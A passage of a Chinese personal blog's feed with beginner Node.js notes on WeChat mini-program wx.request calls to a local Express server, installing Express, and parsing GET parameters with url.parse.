class="name">text</span>></span></span></span><br><span class="line"><span class="language-xml"> <span class="tag"></<span class="name">view</span>></span></span></span><br><span class="line"><span class="language-xml"> <span class="tag"></<span class="name">block</span>></span></span></span><br><span class="line"></view></span><br></pre></td></tr></table></figure><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//index.js</span></span><br><span class="line"><span class="title class_">Page</span>({</span><br><span class="line"> <span class="attr">data</span>: {</span><br><span class="line"> <span class="attr">contents</span>: {}</span><br><span class="line"> },</span><br><span class="line"> <span class="attr">onLoad</span>: <span class="keyword">function</span> (<span class="params">options</span>) {</span><br><span class="line"> <span class="keyword">var</span> that = <span class="variable language_">this</span></span><br><span class="line"> wx.<span class="title function_">request</span>({</span><br><span class="line"> <span class="attr">url</span>: <span class="string">'https://xxxxxxx.com'</span>,</span><br><span class="line"> <span class="attr">data</span>: {},</span><br><span class="line"> <span class="attr">method</span>: <span class="string">'GET'</span>,</span><br><span class="line"> <span class="attr">success</span>: <span class="keyword">function</span> (<span class="params">res</span>) {</span><br><span class="line"> <span class="comment">// success</span></span><br><span class="line"> that.<span class="title function_">setData</span>({</span><br><span class="line"> <span class="attr">contents</span>: res.<span class="property">data</span></span><br><span class="line"> })</span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">'require success'</span>, res)</span><br><span class="line"> },</span><br><span class="line"> <span class="attr">fail</span>: <span class="keyword">function</span> (<span class="params">err</span>) {</span><br><span class="line"> <span class="comment">// fail</span></span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">'require fail'</span> ,err)</span><br><span class="line"> },</span><br><span class="line"> <span class="attr">complete</span>: <span class="keyword">function</span> (<span class="params"></span>) {</span><br><span class="line"> <span class="comment">// complete</span></span><br><span class="line"> }</span><br><span class="line"> })</span><br><span class="line"> }</span><br><span class="line">})</span><br></pre></td></tr></table></figure><p>请求成功后获取到的数据就是success函数的参数res,打印这个数据如果如下所示:<br><img src="https://img-blog.csdnimg.cn/20200321081223532.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center=30x30@[TOC]" alt="在这里插入图片描述"></p><hr><h3 id="fail-amp-complete"><a href="#fail-amp-complete" class="headerlink" title="fail&complete"></a>fail&complete</h3><p> fail函数:如果接口调用失败的话,那么,小程序就会触发这个函数,返回错误信息。</p><p> complete函数:接口调用结束的回调函数(调用成功、失败都会执行)。</p><p> 代码使用我在success中举例的代码即可,错误时就会打印错误信息。</p><hr><h3 id="url的node-js代码"><a href="#url的node-js代码" class="headerlink" title="url的node.js代码"></a>url的node.js代码</h3><p> 现在就差node.js写的url接口代码了。</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//upLoad.js</span></span><br><span class="line"><span class="keyword">var</span> express = <span class="built_in">require</span>(<span class="string">'express'</span>)</span><br><span class="line"><span class="keyword">var</span> app = <span class="title function_">express</span>()</span><br><span class="line"><span class="keyword">var</span> comments = [{</span><br><span class="line"> <span class="attr">id</span>: <span class="string">'1'</span>,</span><br><span class="line"> <span class="attr">behavior</span>: <span class="string">'起床'</span>,</span><br><span class="line"> <span class="attr">dateTime</span>: <span class="string">'7:00'</span></span><br><span class="line"> },</span><br><span class="line"> {</span><br><span class="line"> <span class="attr">id</span>: <span class="string">'2'</span>,</span><br><span class="line"> <span class="attr">behavior</span>: <span class="string">'学习'</span>,</span><br><span class="line"> <span class="attr">dateTime</span>: <span class="string">'7:30'</span></span><br><span class="line"> },</span><br><span class="line"> {</span><br><span class="line"> <span class="attr">id</span>: <span class="string">'3'</span>,</span><br><span class="line"> <span class="attr">behaviore</span>: <span class="string">'吃饭'</span>,</span><br><span class="line"> <span class="attr">dateTime</span>: <span class="string">'9:00'</span></span><br><span class="line"> },</span><br><span class="line"> {</span><br><span class="line"> <span class="attr">id</span>: <span class="string">'4'</span>,</span><br><span class="line"> <span class="attr">behavior</span>: <span class="string">'午睡'</span>,</span><br><span class="line"> <span class="attr">dateTime</span>: <span class="string">'13:00'</span></span><br><span class="line"> }</span><br><span class="line">]</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">'/'</span>, <span class="keyword">function</span>(<span class="params">req, res</span>) {</span><br><span class="line"> res.<span class="title function_">json</span>(comments)</span><br><span class="line">})</span><br><span class="line"><span class="keyword">var</span> server = app.<span class="title function_">listen</span>(<span class="number">36631</span>, <span class="keyword">function</span>(<span class="params"></span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> host = server.<span class="title function_">address</span>().<span class="property">address</span></span><br><span class="line"> <span class="keyword">var</span> port = server.<span class="title function_">address</span>().<span class="property">port</span></span><br><span class="line"></span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"应用实例,访问地址为 http://%s:%s"</span>, host, port)</span><br><span class="line"></span><br><span class="line">})</span><br></pre></td></tr></table></figure><p>upLoad.js部分的代码我使用了express框架,当然不用也可以,我把不用express框架的代码也发一下:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> http = <span class="built_in">require</span>(<span class="string">'http'</span>)</span><br><span class="line"><span class="keyword">const</span> url = <span class="built_in">require</span>(<span class="string">'url'</span>)</span><br><span class="line"><span class="keyword">var</span> comments = [{</span><br><span class="line"> <span class="attr">id</span>: <span class="string">'1'</span>,</span><br><span class="line"> <span class="attr">behavior</span>: <span class="string">'起床'</span>,</span><br><span class="line"> <span class="attr">dateTime</span>: <span class="string">'7:00'</span></span><br><span class="line"> },</span><br><span class="line"> {</span><br><span class="line"> <span class="attr">id</span>: <span class="string">'2'</span>,</span><br><span class="line"> <span class="attr">behavior</span>: <span class="string">'学习'</span>,</span><br><span class="line"> <span class="attr">dateTime</span>: <span class="string">'7:30'</span></span><br><span class="line"> },</span><br><span class="line"> {</span><br><span class="line"> <span class="attr">id</span>: <span class="string">'3'</span>,</span><br><span class="line"> <span class="attr">behaviore</span>: <span class="string">'吃饭'</span>,</span><br><span class="line"> <span class="attr">dateTime</span>: <span class="string">'9:00'</span></span><br><span class="line"> },</span><br><span class="line"> {</span><br><span class="line"> <span class="attr">id</span>: <span class="string">'4'</span>,</span><br><span class="line"> <span class="attr">behavior</span>: <span class="string">'午睡'</span>,</span><br><span class="line"> <span class="attr">dateTime</span>: <span class="string">'13:00'</span></span><br><span class="line"> }</span><br><span class="line">]</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> jjson = <span class="title class_">JSON</span>.<span class="title function_">stringify</span>(comments)</span><br><span class="line">http.<span class="title function_">createServer</span>(<span class="keyword">function</span>(<span class="params">req, res</span>) {</span><br><span class="line"> res.<span class="title function_">setHeader</span>(<span class="string">'Content-Type'</span>, <span class="string">'text/palin; charset=utf-8'</span>);</span><br><span class="line"> <span class="keyword">var</span> pathname = url.<span class="title function_">parse</span>(req.<span class="property">url</span>).<span class="property">pathname</span></span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(pathname)</span><br><span class="line"> <span class="keyword">if</span> (pathname == <span class="string">'/'</span>) {</span><br><span class="line"> res.<span class="title function_">end</span>(jjson)</span><br><span class="line"> }</span><br><span class="line">}).<span class="title function_">listen</span>(<span class="number">36631</span>)</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"http://127.0.0.1:36631"</span>)</span><br></pre></td></tr></table></figure><p>如果不用框架的话可能会导致浏览器浏览时出现中文乱码,只要写入<code>res.setHeader('Content-Type', 'text/palin; charset=utf-8');</code>即可,要用<code>res.writeHead</code>需要和<code>res.end</code>组合,具体怎么用还是自行搜索吧,我也不太了解。<br>upLoad.js的代码我都设置了路由,不用路由的话把</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">app.<span class="title function_">get</span>(<span class="string">'/'</span>, <span class="keyword">function</span>(<span class="params">req, res</span>) {</span><br><span class="line"> res.<span class="title function_">json</span>(comments)</span><br><span class="line">})</span><br><span class="line"><span class="keyword">var</span> server = app.<span class="title function_">listen</span>(<span class="number">36631</span>, <span class="keyword">function</span>(<span class="params"></span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> host = server.<span class="title function_">address</span>().<span class="property">address</span></span><br><span class="line"> <span class="keyword">var</span> port = server.<span class="title function_">address</span>().<span class="property">port</span></span><br><span class="line"></span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"应用实例,访问地址为 http://%s:%s"</span>, host, port)</span><br><span class="line"></span><br><span class="line">})</span><br></pre></td></tr></table></figure><p>这部分换成这</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">app.<span class="title function_">listen</span>(<span class="number">36631</span>)</span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">'/'</span>,<span class="keyword">function</span>(<span class="params">req,res</span>) {</span><br><span class="line"> res.<span class="title function_">json</span>(comments)</span><br><span class="line">})</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"http://127.0.0.1:36631"</span>)</span><br></pre></td></tr></table></figure><p>部分就行。不用express框架的不用路由我没写。</p><hr><p>代码就三部分,upLoad.js代码写在项目根目录下就行,你要是把它和.wxml文件放在一个目录里也行。这里有一个比较有趣的点,就是无论你在项目根目录还是带.wxml的目录里放upLoad.js,小程序成功编译后在你没放的目录里就会自动生成一个upLoad.js,只不过新生成的内容为空。<br>在upLoad.js的目录下果断cmd运行node,首次运行就在你写upLoad.js的目录下运行,运行成功后再浏览器输入访问地址<code>http://127.0.0.1:36631</code>就能看到“id”,“dateTime”这些数据了,之后在开发者工具里点击编译就能看到结果了<br><img src="https://img-blog.csdnimg.cn/20200321082735880.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h2 id="这就完事了"><a href="#这就完事了" class="headerlink" title="这就完事了~"></a>这就完事了~</h2><hr><p>番外再说几点:</p><ol><li>开发者工具编译成功后虽然会有两个upLoad.js,但是再使用node运行upLoad.js文件时还是要在有内容的upLoad.js的目录下运行,否则就会出现下面这种情况(我写博客的时候用的名称是upLoad.js,我个人用的名称是upLoadUrl.js)<br><img src="https://img-blog.csdnimg.cn/20200321083627116.jpg#pic_center" alt="在这里插入图片描述"><br>运行命令输入完啥也没有,正常应该是这样<br><img src="https://img-blog.csdnimg.cn/20200321083803415.jpg#pic_center" alt="在这里插入图片描述"><br>然后拿着这个地址去浏览器就能打开</li><li>本人也是在本地调试,用的Charles这个软件将https域名转为本地接口,具体用法可以去“一个人也很酷”的csdn博客下找一篇名为《微信小程序 本地开发》的博客。本菜鸟最近才写博客,不知道引用别人博客链接会不会犯法……,所以就这样写了,哈哈。我想说的是这个Charles过一会不用就自动停止了,这时候开发者工具编译就会出错<br> <img src="https://img-blog.csdnimg.cn/20200321085449791.jpg#pic_center" alt="在这里插入图片描述"><br>再启动一次Charles就好了。本地调试url处写的接口地址写你小程序绑定的域名就行,和文章开头一样。</li></ol><hr><p> 大致写这么多应该就够了,如果有错请各位道友指出,本人一定及时修改。也欢迎各位在评论区讨论交流,我也是菜鸟一枚,咱们可以共同进步↖(^ω^)↗<br> (本人菜鸡一枚,所以只是简析一下wx:request的功能用法,本人也是看了许多别的前辈的文章加自己的理解写的这篇博客,写的不好见谅,小声bb~)</p><hr><p> 后续本人会对写过的博客进行更新</p><hr>]]></content>
<summary type="html"><h2 id="简析wx-request"><a href="#简析wx-request" class="headerlink" title="简析wx.request"></a>简析wx.request</h2><h3 id="url"><a href="#url" class</summary>
<category term="WeChat Applet" scheme="http://example.com/categories/WeChat-Applet/"/>
<category term="solution" scheme="http://example.com/tags/solution/"/>
<category term="nodejs" scheme="http://example.com/tags/nodejs/"/>
</entry>
<entry>
<title>Express框架安装</title>
<link href="http://example.com/2020/03/19/Node.js%E4%B8%AA%E4%BA%BA%E7%90%86%E8%A7%A3%E2%80%94%E2%80%94Express%E5%AE%89%E8%A3%85%E6%A1%86%E6%9E%B6/"/>
<id>http://example.com/2020/03/19/Node.js%E4%B8%AA%E4%BA%BA%E7%90%86%E8%A7%A3%E2%80%94%E2%80%94Express%E5%AE%89%E8%A3%85%E6%A1%86%E6%9E%B6/</id>
<published>2020-03-19T10:37:27.000Z</published>
<updated>2022-03-18T06:03:46.014Z</updated>
<content type="html"><![CDATA[<h2 id="Express-简介"><a href="#Express-简介" class="headerlink" title="Express 简介"></a>Express 简介</h2><p>Express 框架核心特性:</p><ul><li>可以设置中间件来响应 HTTP 请求</li><li>定义了路由表用于执行不同的 HTTP 请求动作。</li><li>可以通过向模板传递参数来动态渲染 HTML 页面。</li></ul><hr><h2 id="安装-Express"><a href="#安装-Express" class="headerlink" title="安装 Express"></a>安装 Express</h2><p>安装 Express 并将其保存到依赖列表中:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ cnpm install express --save</span><br></pre></td></tr></table></figure><p>或者</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ npm install express --save</span><br></pre></td></tr></table></figure><p> 以上命令会将 Express 框架安装在当前目录的 node_modules 目录中, node_modules 目录下会自动创建 express 目录。以下几个重要的模块是需要与 express 框架一起安装的:</p><ul><li>body-parser - node.js 中间件,用于处理 JSON, Raw, Text 和 URL 编码的数据。</li><li>cookie-parser - 这就是一个解析Cookie的工具。通过req.cookies可以取到传过来的cookie,并把它们转成对象。</li><li>multer - node.js 中间件,用于处理 enctype=”multipart/form-data”(设置表单的MIME编码)的表单数据。</li></ul><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ cnpm install body-parser --save</span><br><span class="line">$ cnpm install cookie-parser --save</span><br><span class="line">$ cnpm install multer --save</span><br></pre></td></tr></table></figure><p>或者</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ npm install body-parser --save</span><br><span class="line">$ npm install cookie-parser --save</span><br><span class="line">$ npm install multer --save </span><br></pre></td></tr></table></figure><p>安装完后,我们可以查看下 express 使用的版本号:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ cnpm list express</span><br><span class="line">/data/www/node</span><br><span class="line">└── express@<span class="number">4.15</span><span class="number">.2</span> -> <span class="regexp">/Users/</span>tianqixin/www/node/node_modules/<span class="number">.4</span><span class="number">.15</span><span class="number">.2</span>@express</span><br></pre></td></tr></table></figure><p>windows的自己去掉”$”,这个应该都会吧……</p><hr><p>npm下载慢都知道,可以更换淘宝镜像源:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">npm config set registry <span class="attr">https</span>:<span class="comment">//registry.npm.taobao.org </span></span><br></pre></td></tr></table></figure><p>– 配置后可通过下面方式来验证是否成功 </p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">npm config get registry </span><br><span class="line">– 或npm info express</span><br></pre></td></tr></table></figure><p>题外话,关于Node.js环境配置和Express安装刚详细的教程推荐一篇<a href="https://zhuanlan.zhihu.com/p/77594251">知乎文章</a></p><hr><h2 id="第一个-Express-框架实例"><a href="#第一个-Express-框架实例" class="headerlink" title="第一个 Express 框架实例"></a>第一个 Express 框架实例</h2><p>接下来我们使用 Express 框架来输出 “Hello World”。<br>以下实例中我们引入了 express 模块,并在客户端发起请求后,响应 “Hello World” 字符串。<br>创建 express_demo.js 文件,代码如下所示:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//express_demo.js 文件</span></span><br><span class="line"><span class="keyword">var</span> express = <span class="built_in">require</span>(<span class="string">'express'</span>);</span><br><span class="line"><span class="keyword">var</span> app = <span class="title function_">express</span>();</span><br><span class="line"> </span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">'/'</span>, <span class="keyword">function</span> (<span class="params">req, res</span>) {</span><br><span class="line"> res.<span class="title function_">send</span>(<span class="string">'Hello World'</span>);</span><br><span class="line">})</span><br><span class="line"> </span><br><span class="line"><span class="keyword">var</span> server = app.<span class="title function_">listen</span>(<span class="number">8081</span>, <span class="keyword">function</span> (<span class="params"></span>) {</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">var</span> host = server.<span class="title function_">address</span>().<span class="property">address</span></span><br><span class="line"> <span class="keyword">var</span> port = server.<span class="title function_">address</span>().<span class="property">port</span></span><br><span class="line"> </span><br><span class="line"> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">"应用实例,访问地址为 http://%s:%s"</span>, host, port)</span><br><span class="line"> </span><br><span class="line">})</span><br></pre></td></tr></table></figure><p>执行以上代码:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ node express_demo.<span class="property">js</span> </span><br><span class="line">应用实例,访问地址为 <span class="attr">http</span>:<span class="comment">//0.0.0.0:8081</span></span><br></pre></td></tr></table></figure><p>在浏览器中访问 <a href="http://127.0.0.1:8081,结果如下图所示:">http://127.0.0.1:8081,结果如下图所示:</a><br><img src="https://img-blog.csdnimg.cn/20200319173423380.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p><h3 id="请求和响应"><a href="#请求和响应" class="headerlink" title="请求和响应"></a>请求和响应</h3><p>(复制粘贴于<a href="https://www.runoob.com/nodejs/nodejs-express-framework.html">菜鸟教程</a>)<br>Express 应用使用回调函数的参数: <strong>request</strong> 和 <strong>response</strong> 对象来处理请求和响应的数据。</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">app.<span class="title function_">get</span>(<span class="string">'/'</span>, <span class="keyword">function</span> (<span class="params">req, res</span>) {</span><br><span class="line"> <span class="comment">// --</span></span><br><span class="line">})</span><br></pre></td></tr></table></figure><p><strong>request</strong> 和 <strong>response</strong> 对象的具体介绍:</p><p><strong>Request 对象</strong> - request 对象表示 HTTP 请求,包含了请求查询字符串,参数,内容,HTTP 头部等属性。常见属性有:</p><ol><li>req.app:当callback为外部文件时,用req.app访问express的实例</li><li>req.baseUrl:获取路由当前安装的URL路径</li><li>req.body / req.cookies:获得「请求主体」/ Cookies</li><li>req.fresh / req.stale:判断请求是否还「新鲜」</li><li>req.hostname / req.ip:获取主机名和IP地址</li><li>req.originalUrl:获取原始请求URL</li><li>req.params:获取路由的parameters</li><li>req.path:获取请求路径</li><li>req.protocol:获取协议类型</li><li>req.query:获取URL的查询参数串</li><li>req.route:获取当前匹配的路由</li><li>req.subdomains:获取子域名</li><li>req.accepts():检查可接受的请求的文档类型</li><li>req.acceptsCharsets / req.acceptsEncodings / req.acceptsLanguages:返回指定字符集的第一个可接受字符编码</li><li>req.get():获取指定的HTTP请求头</li><li>req.is():判断请求头Content-Type的MIME类型</li></ol><p><strong>Response 对象</strong> - response 对象表示 HTTP 响应,即在接收到请求时向客户端发送的 HTTP 响应数据。常见属性有:</p><ol><li>res.app:同req.app一样</li><li>res.append():追加指定HTTP头</li><li>res.set()在res.append()后将重置之前设置的头</li><li>res.cookie(name,value [,option]):设置Cookie</li><li>opition: domain / expires / httpOnly / maxAge / path / secure / signed</li><li>res.clearCookie():清除Cookie</li><li>res.download():传送指定路径的文件</li><li>res.get():返回指定的HTTP头</li><li>res.json():传送JSON响应</li><li>res.jsonp():传送JSONP响应</li><li>res.location():只设置响应的Location HTTP头,不设置状态码或者close response</li><li>res.redirect():设置响应的Location HTTP头,并且设置状态码302</li><li>res.render(view,[locals],callback):渲染一个view,同时向callback传递渲染后的字符串,如果在渲染过程中有错误发生next(err)将会被自动调用。callback将会被传入一个可能发生的错误以及渲染后的页面,这样就不会自动输出了。</li><li>res.send():传送HTTP响应</li><li>res.sendFile(path [,options] [,fn]):传送指定路径的文件 -会自动根据文件extension设定Content-Type</li><li>res.set():设置HTTP头,传入object可以一次设置多个头</li><li>res.status():设置HTTP状态码</li><li>res.type():设置Content-Type的MIME类型</li></ol><hr><h2 id="路由"><a href="#路由" class="headerlink" title="路由"></a>路由</h2><p>我们已经了解了 HTTP 请求的基本应用,而路由决定了由谁(指定脚本)去响应客户端请求。<br>在HTTP请求中,我们可以通过路由提取出请求的URL以及GET/POST参数。<br>接下来我们扩展 Hello World,添加一些功能来处理更多类型的 HTTP 请求。<br>创建 express_demo2.js 文件,代码如下所示:<br><strong>啥也没有</strong><br>在原<a href="https://www.runoob.com/nodejs/nodejs-express-framework.html">菜鸟教程</a>文档中剩下的就是举例,可以自己敲代码来验证,本篇博客是笔记向,就不过多复制粘贴了。<br>当然,在对代码更加深入了解后会回来更新的。</p><p>本篇博客是参考<a href="https://www.runoob.com/nodejs/nodejs-express-framework.html">Node.js菜鸟教程</a>,详情可跳至<a href="https://www.runoob.com/nodejs/nodejs-express-framework.html">菜鸟教程</a>。</p><hr><p>后续本人会对写过的博客进行更新</p><hr>]]></content>
<summary type="html"><h2 id="Express-简介"><a href="#Express-简介" class="headerlink" title="Express 简介"></a>Express 简介</h2><p>Express 框架核心特性:</p>
<ul>
<li>可以设置中间件来响</summary>
<category term="Nodejs" scheme="http://example.com/categories/Nodejs/"/>
<category term="note" scheme="http://example.com/tags/note/"/>
</entry>
<entry>
<title>GET/POST请求</title>
<link href="http://example.com/2020/03/19/Node.js%E4%B8%AA%E4%BA%BA%E7%90%86%E8%A7%A3%E2%80%94%E2%80%94GET_POST%E8%AF%B7%E6%B1%82/"/>
<id>http://example.com/2020/03/19/Node.js%E4%B8%AA%E4%BA%BA%E7%90%86%E8%A7%A3%E2%80%94%E2%80%94GET_POST%E8%AF%B7%E6%B1%82/</id>
<published>2020-03-19T10:37:12.000Z</published>
<updated>2022-03-18T06:03:46.015Z</updated>
<content type="html"><![CDATA[<p>表单提交到服务器一般都使用 GET/POST 请求。</p><h2 id="获取GET请求内容"><a href="#获取GET请求内容" class="headerlink" title="获取GET请求内容"></a>获取GET请求内容</h2><p>由于GET请求直接被嵌入在路径中,URL是完整的请求路径,包括了?后面的部分,因此你可以手动解析后面的内容作为GET请求的参数。</p><ul><li>node.js 中 url 模块中的 parse 函数提供了这个功能。</li></ul><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> http = <span class="built_in">require</span>(<span class="string">'http'</span>);</span><br><span class="line"><span class="keyword">var</span> url = <span class="built_in">require</span>(<span class="string">'url'</span>);</span><br><span class="line"><span class="keyword">var</span> util = <span class="built_in">require</span>(<span class="string">'util'</span>);</span><br><span class="line"> </span><br><span class="line">http.<span class="title function_">createServer</span>(<span class="keyword">function</span>(<span class="params">req, res</span>){</span><br><span class="line"> res.<span class="title function_">writeHead</span>(<span class="number">200</span>, {<span class="string">'Content-Type'</span>: <span class="string">'text/plain; charset=utf-8'</span>});</span><br><span class="line"> res.<span class="title function_">end</span>(util.<span class="title function_">inspect</span>(url.<span class="title function_">parse</span>(req.<span class="property">url</span>, <span class="literal">true</span>)));</span><br><span class="line">}).<span class="title function_">listen</span>(<span class="number">3000</span>);</span><br></pre></td></tr></table></figure><p>在浏览器中访问 <strong><a href="http://localhost:3000/user?name=%E8%8F%9C%E9%B8%9F%E6%95%99%E7%A8%8B&url=www.runoob.com">http://localhost:3000/user?name=菜鸟教程&url=www.runoob.com</a></strong> 然后查看返回结果:<br><img src="https://img-blog.csdnimg.cn/20200319165130303.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p><h2 id="获取-URL-的参数"><a href="#获取-URL-的参数" class="headerlink" title="获取 URL 的参数"></a>获取 URL 的参数</h2><p>我们可以使用 url.parse 方法来解析 URL 中的参数,代码如下:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> http = <span class="built_in">require</span>(<span class="string">'http'</span>);</span><br><span class="line"><span class="keyword">var</span> url = <span class="built_in">require</span>(<span class="string">'url'</span>);</span><br><span class="line"><span class="keyword">var</span> util = <span class="built_in">require</span>(<span class="string">'util'</span>);</span><br><span class="line"> </span><br><span class="line">http.<span class="title function_">createServer</span>(<span class="keyword">function</span>(<span class="params">req, res</span>){</span><br><span class="line"> res.<span class="title function_">writeHead</span>(<span class="number">200</span>, {<span class="string">'Content-Type'</span>: <span class="string">'text/plain'</span>});</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// 解析 url 参数</span></span><br><span class="line"> <span class="keyword">var</span> params = url.<span class="title function_">parse</span>(req.<span class="property">url</span>, <span class="literal">true</span>).<span class="property">query</span>;</span><br><span class="line"> res.<span class="title function_">write</span>(<span class="string">"网站名:"</span> + params.<span class="property">name</span>);</span><br><span class="line"> res.<span class="title function_">write</span>(<span class="string">"\n"</span>);</span><br><span class="line"> res.<span class="title function_">write</span>(<span class="string">"网站 URL:"</span> + params.<span class="property">url</span>);</span><br><span class="line"> res.<span class="title function_">end</span>();</span><br><span class="line"> </span><br><span class="line">}).<span class="title function_">listen</span>(<span class="number">3000</span>);</span><br></pre></td></tr></table></figure><p>在浏览器中访问 <strong><a 